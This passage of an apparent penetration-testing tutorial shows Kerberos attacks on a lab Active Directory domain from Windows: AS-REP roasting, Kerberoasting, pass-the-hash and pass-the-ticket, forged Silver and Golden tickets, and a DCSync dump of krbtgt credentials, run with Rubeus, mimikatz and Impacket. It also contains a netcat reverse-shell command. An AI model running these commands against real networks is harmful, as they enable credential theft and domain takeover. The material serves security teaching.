Windows Abuse
In this section, we'll perform the same attacks we demonstrated earlier in this article, but on Windows. Of course, these attacks require you to have shell access to a Windows machine that is part of the domain.
Tools
Note
These tools are often detected by antivirus software, so you must be cautious in real-world scenarios. However, for the purpose of this article, I disabled the antivirus to simplify the process.
Kerberos Brute Force
This technique is not effective for user enumeration because you can retrieve domain user accounts directly using PowerShell:
# Using net command (builtin command)
net user /domain
# Using ActiveDirectory module
Get-ADUser -Filter * | Select-Object SamAccountName
However, password brute-forcing against a list of usernames can still be useful. You can supply both a username list and a password list to perform the brute force attack:
# Providing a users list
.\Rubeus.exe brute /passwords:passwords.txt /users:users.txt /domain:elswixcorp.local /outfile:valid_creds.txt
# For all users in the current domain
.\Rubeus.exe brute /passwords:passwords.txt /outfile:valid_creds.txt
AS-REP Roasting
You can exploit an AS-REP Roasting attack using Rubeus:
*Evil-WinRM* PS C:\temp> .\Rubeus.exe asreproast /format:john /outfile:asrep_roast.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: AS-REP roasting
[*] Target Domain : elswixcorp.local
[*] Searching path 'LDAP://dc01.elswixcorp.local/DC=elswixcorp,DC=local' for '(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=4194304))'
[*] SamAccountName : peter
[*] DistinguishedName : CN=peter,CN=Users,DC=elswixcorp,DC=local
[*] Using domain controller: dc01.elswixcorp.local (fe80::2810:e2e3:6669:29d0%8)
[*] Building AS-REQ (w/o preauth) for: 'elswixcorp.local\peter'
[+] AS-REQ w/o preauth successful!
[*] Hash written to C:\temp\asrep_roast.txt
[*] Roasted hashes written to : C:\temp\asrep_roast.txt
This command performs an AS-REP Roasting attack against users in the current domain and saves the retrieved hashes to the asrep_roast.txt file:
*Evil-WinRM* PS C:\temp> cat asrep_roast.txt
$krb5asrep$peter@elswixcorp.local:47BCC0EBF603F4499F31B296940F5E84$DC5256536C429D44BE4A8666D639E825809047A251FDF302980F31B347B4B42B9254676578F486E498989CE2B83BCA2A26ECB2310B7E7AEC4B6CAA590D6FF75FB930321606129849D64407D8C46449412F0DA06288171897A876EF4594A738F50DAB7D6BCD56452880F2A282BB56242C34F14387BA7C681418B394BD4B8325725E68E19A813CD6903062D96F4FB86D3D5CA4B2044514EC8DCA87AFFC57F765A73B66633FD8F46B0F0FA4DD2785C999B3C4E30005E3760F9705977C632A9C5207F6A9976A9DA463069A4BC4E43E280D6381367D5D9756C631F470F52E42F260C5B55CC4FE6DBAE0CFCD2A8F250623CE4B2D63D8F7
*Evil-WinRM* PS C:\temp>
You can crack this hash using john.
Kerberoasting
To perform a Kerberoasting attack with Rubeus, you need to provide credentials:
*Evil-WinRM* PS C:\temp> .\rubeus.exe kerberoast /creduser:elswixcorp.local\peter /credpassword:cr4ckthis4n!c% /outfile:hash.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain : elswixcorp.local
[*] Searching path 'LDAP://dc01.elswixcorp.local/DC=elswixcorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : ellie
[*] DistinguishedName : CN=ellie,CN=Users,DC=elswixcorp,DC=local
[*] ServicePrincipalName : http/ellie
[*] PwdLastSet : 12/19/2024 7:04:52 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\temp\hash.txt
[*] Roasted hashes written to : C:\temp\hash.txt
As shown, the tool identified one vulnerable user and saved the roasted hash to hash.txt as specified using the /outfile parameter.
Overpass The Hash/Pass The Key
Rubeus also allows you to authenticate using a hash or key. For example, you can request a TGT from the KDC by providing the NT hash:
*Evil-WinRM* PS C:\temp> .\rubeus.exe asktgt /user:administrator /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /outfile:administrator.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Ask TGT
[*] Got domain: elswixcorp.local
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'elswixcorp.local\administrator'
[*] Using domain controller: fe80::2810:e2e3:6669:29d0%8:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIF7DCCBeigAwIBBaEDAgEWooIE8DCCBOxhggToMIIE5KADAgEFoRIbEEVMU1dJWENPUlAuTE9DQUyi
...[snip]...
OFqnERgPMjAyNTAxMDIwNDE5MjhaqBIbEEVMU1dJWENPUlAuTE9DQUypJTAjoAMCAQKhHDAaGwZrcmJ0
Z3QbEGVsc3dpeGNvcnAubG9jYWw=
[*] Ticket written to administrator.kirbi
ServiceName : krbtgt/elswixcorp.local
ServiceRealm : ELSWIXCORP.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : ELSWIXCORP.LOCAL
StartTime : 12/25/2024 8:19:28 PM
EndTime : 12/26/2024 6:19:28 AM
RenewTill : 1/1/2025 8:19:28 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : 3Zk+IPnVyZ0kW85esGiKDw==
ASREP (key) : 58A478135A93AC3BF058A5EA0E8FDB71
Here, we successfully obtained a TGT for the administrator account using the /rc4 parameter to provide the NT hash. You can also use an AES-256 key:
*Evil-WinRM* PS C:\temp> .\rubeus.exe asktgt /user:administrator /aes256:30ed0b2f17e5fc76b29402e3da4bd05337abfcdc2a6412d08d6d4e68db070506 /outfile:administrator.kirbi
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Ask TGT
[*] Got domain: elswixcorp.local
[*] Using aes256_cts_hmac_sha1 hash: 30ed0b2f17e5fc76b29402e3da4bd05337abfcdc2a6412d08d6d4e68db070506
[*] Building AS-REQ (w/ preauth) for: 'elswixcorp.local\administrator'
[*] Using domain controller: fe80::2810:e2e3:6669:29d0%8:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIGDDCCBgigAwIBBaEDAgEWooIFADCCBPxhggT4MIIE9KADAgEFoRIbEEVMU1dJWENPUlAuTE9DQUyi
...[snip]...
V0lYQ09SUC5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQZWxzd2l4Y29ycC5sb2NhbA==
[*] Ticket written to administrator.kirbi
ServiceName : krbtgt/elswixcorp.local
ServiceRealm : ELSWIXCORP.LOCAL
UserName : administrator (NT_PRINCIPAL)
UserRealm : ELSWIXCORP.LOCAL
StartTime : 12/25/2024 8:20:13 PM
EndTime : 12/26/2024 6:20:13 AM
RenewTill : 1/1/2025 8:20:13 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : oFBG2IELW1tOcfTyd7NmpgpQk3rDAdJf5c4GnwIC4VE=
ASREP (key) : 30ED0B2F17E5FC76B29402E3DA4BD05337ABFCDC2A6412D08D6D4E68DB070506
The TGT was saved as administrator.kirbi. This ticket can now be used for Pass-The-Ticket.
Pass The Ticket
For example, in the earlier Kerberoasting attack, we used credentials to obtain tickets. Now, we'll use the previously saved ticket for Pass-The-Ticket and replicate the Kerberoasting attack:
*Evil-WinRM* PS C:\temp> .\rubeus.exe kerberoast /ticket:administrator.kirbi /outfile:kerberoasting.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Kerberoasting
[*] Using a TGT /ticket to request service tickets
[*] Target Domain : elswixcorp.local
[+] Ticket successfully imported!
[*] Searching path 'LDAP://dc01.elswixcorp.local/DC=elswixcorp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'
[*] Total kerberoastable users : 1
[*] SamAccountName : ellie
[*] DistinguishedName : CN=ellie,CN=Users,DC=elswixcorp,DC=local
[*] ServicePrincipalName : http/ellie
[*] PwdLastSet : 12/19/2024 7:04:52 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\temp\kerberoasting.txt
[*] Roasted hashes written to : C:\temp\kerberoasting.txt
You can also use this ticket on Linux. First, download the administrator.kirbi file to your Linux machine. To use it, you need to convert it into the ccache format. Fortunately, Impacket provides a script called ticketConverter.py for this purpose:
elswix@ubuntu$ ticketConverter.py administrator.kirbi administrator.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
After converting the ticket, export the KRB5CCNAME variable and use psexec.py to gain access to the system:
elswix@ubuntu$ export KRB5CCNAME=administrator.ccache
elswix@ubuntu$ psexec.py dc01.elswixcorp.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc01.elswixcorp.local.....
[*] Found writable share ADMIN$
[*] Uploading file FSwxVQJk.exe
[*] Opening SVCManager on dc01.elswixcorp.local.....
[*] Creating service bAch on dc01.elswixcorp.local.....
[*] Starting service bAch.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Silver Ticket
You can generate a Silver Ticket using mimikatz:
*Evil-WinRM* PS C:\temp> .\mimikatz.exe "kerberos::golden /domain:elswixcorp.local /sid:S-1-5-21-1672168468-2738507895-2086515240 /rc4:96A44FFBF8BB1958B54D4D04C9C14F95 /user:administrator /service:MSSQLSVC /target:dc01.elswixcorp.local" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /domain:elswixcorp.local /sid:S-1-5-21-1672168468-2738507895-2086515240 /rc4:96A44FFBF8BB1958B54D4D04C9C14F95 /user:administrator /service:MSSQLSVC /target:dc01.elswixcorp.local
User : administrator
Domain : elswixcorp.local (ELSWIXCORP)
SID : S-1-5-21-1672168468-2738507895-2086515240
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 96a44ffbf8bb1958b54d4d04c9c14f95 - rc4_hmac_nt
Service : MSSQLSVC
Target : dc01.elswixcorp.local
Lifetime : 12/26/2024 1:44:41 PM ; 12/24/2034 1:44:41 PM ; 12/24/2034 1:44:41 PM
-> Ticket : ticket.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\temp>
This command creates a .kirbi file with the Service Ticket. You can then download it to your Linux machine, convert it to ccache format, and use it for authentication:
elswix@ubuntu$ mssqlclient.py dc01.elswixcorp.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(dc01): Line 1: Changed database context to 'master'.
[*] INFO(dc01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (ELSWIXCORP\Administrator dbo@master)>
Golden Ticket
You can create a Golden Ticket using mimikatz:
*Evil-WinRM* PS C:\temp> .\mimikatz.exe "kerberos::golden /domain:elswixcorp.local /sid:S-1-5-21-1672168468-2738507895-2086515240 /rc4:a88e9a174ee94f60f932fec548a84ccb /user:administrator" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # kerberos::golden /domain:elswixcorp.local /sid:S-1-5-21-1672168468-2738507895-2086515240 /rc4:a88e9a174ee94f60f932fec548a84ccb /user:administrator
User : administrator
Domain : elswixcorp.local (ELSWIXCORP)
SID : S-1-5-21-1672168468-2738507895-2086515240
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: a88e9a174ee94f60f932fec548a84ccb - rc4_hmac_nt
Lifetime : 12/26/2024 1:49:23 PM ; 12/24/2034 1:49:23 PM ; 12/24/2034 1:49:23 PM
-> Ticket : ticket.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
mimikatz(commandline) # exit
Bye!
*Evil-WinRM* PS C:\temp>
After creating the ticket.kirbi file, you can download it, convert it to ccache format, and use it for authentication:
elswix@ubuntu$ psexec.py dc01.elswixcorp.local -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc01.elswixcorp.local.....
[*] Found writable share ADMIN$
[*] Uploading file JWnrRWgA.exe
[*] Opening SVCManager on dc01.elswixcorp.local.....
[*] Creating service Ovps on dc01.elswixcorp.local.....
[*] Starting service Ovps.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.587]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Windows - Pass The Ticket
So far, we've demonstrated Pass-The-Ticket on Linux. We generated the tickets on the Windows machine, downloaded them to a Linux machine, converted them, and used them for authentication. However, Pass-The-Ticket can also be performed directly on Windows, though it is slightly more complex.
Challenges with Remote Sessions
When using a remote shell like Evil-WinRM, certain limitations arise because it runs under a remote process. Remote processes often have restrictions that can limit attacks.
For instance, even after importing a valid TGT into a remote session, actions like accessing administrative shares (\\dc01\admin$) or performing DCSync attacks may fail. This occurs because remote sessions use Network Logon (logon type 3), which restricts token usage for sensitive operations.
Bypassing Remote Session Limitations
To bypass these restrictions, you must operate within a local process context. A local process does not inherit the same restrictions, enabling full use of Kerberos tickets. You can achieve this using RunasCs.
For example, using the -l 9 option allows you to start a process with logon type 9 (new credentials logon):
*Evil-WinRM* PS C:\temp> .\RunasCs.exe x x -l 9 "C:\Temp\nc.exe -e cmd 192.168.100.2 3001"
Here, I used a netcat binary to send a reverse shell under logon type 9. This method doesn't require valid credentials because it uses the current account context.
Once in a local context, you can re-import your Kerberos ticket using tools like Rubeus or Mimikatz. For example, let's request a TGT for the administrator account using Rubeus:
PS C:\temp> .\Rubeus.exe asktgt /user:Administrator /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /ptt /domain:elswixcorp.local
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Ask TGT
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'elswixcorp.local\Administrator'
[*] Using domain controller: fe80::2810:e2e3:6669:29d0%8:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIF7DCCBeigAwIBBaEDAgEWooIE8DCCBOxhggToMIIE5KADAgEFoRIbEEVMU1dJWENPUlAuTE9DQUyi
...[snip]...
Z3QbEGVsc3dpeGNvcnAubG9jYWw=
[+] Ticket successfully imported!
ServiceName : krbtgt/elswixcorp.local
ServiceRealm : ELSWIXCORP.LOCAL
UserName : Administrator (NT_PRINCIPAL)
UserRealm : ELSWIXCORP.LOCAL
StartTime : 12/26/2024 3:10:11 PM
EndTime : 12/27/2024 1:10:11 AM
RenewTill : 1/2/2025 3:10:11 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : WED5Phcu4GPzWU1HwtwSog==
ASREP (key) : 58A478135A93AC3BF058A5EA0E8FDB71
The /ptt parameter loads the ticket into the cache for future use. Now, let's perform a DCSync attack to extract the credentials of the krbtgt account:
PS C:\temp> .\mimikatz.exe "lsadump::dcsync /user:krbtgt" "exit"
.\mimikatz.exe "lsadump::dcsync /user:krbtgt" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::dcsync /user:krbtgt
[DC] 'elswixcorp.local' will be the domain
[DC] 'dc01.elswixcorp.local' will be the DC server
[DC] 'krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 12/17/2024 11:57:32 AM
Object Security ID : S-1-5-21-1672168468-2738507895-2086515240-502
Object Relative ID : 502
Credentials:
Hash NTLM: a88e9a174ee94f60f932fec548a84ccb
ntlm- 0: a88e9a174ee94f60f932fec548a84ccb
lm - 0: 6f5a5f80c2e31dbf2da599d5c3705d91
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 67c5f0ed427922973aae6800acbd6e4a
* Primary:Kerberos-Newer-Keys *
Default Salt : ELSWIXCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : bef0966dff97c062c510d879447c7266ac6ffade99d812dfa91c3b15749d3aa4
aes128_hmac (4096) : bec46706fc7f841fa1123cbc7de78cad
des_cbc_md5 (4096) : 629194cdad08d9e5
...[snip]...
mimikatz(commandline) # exit
Bye!
PS C:\temp>
As shown, the attack was successful, and we retrieved the krbtgt account credentials.
This concludes the article. You can find the conclusion in the main document.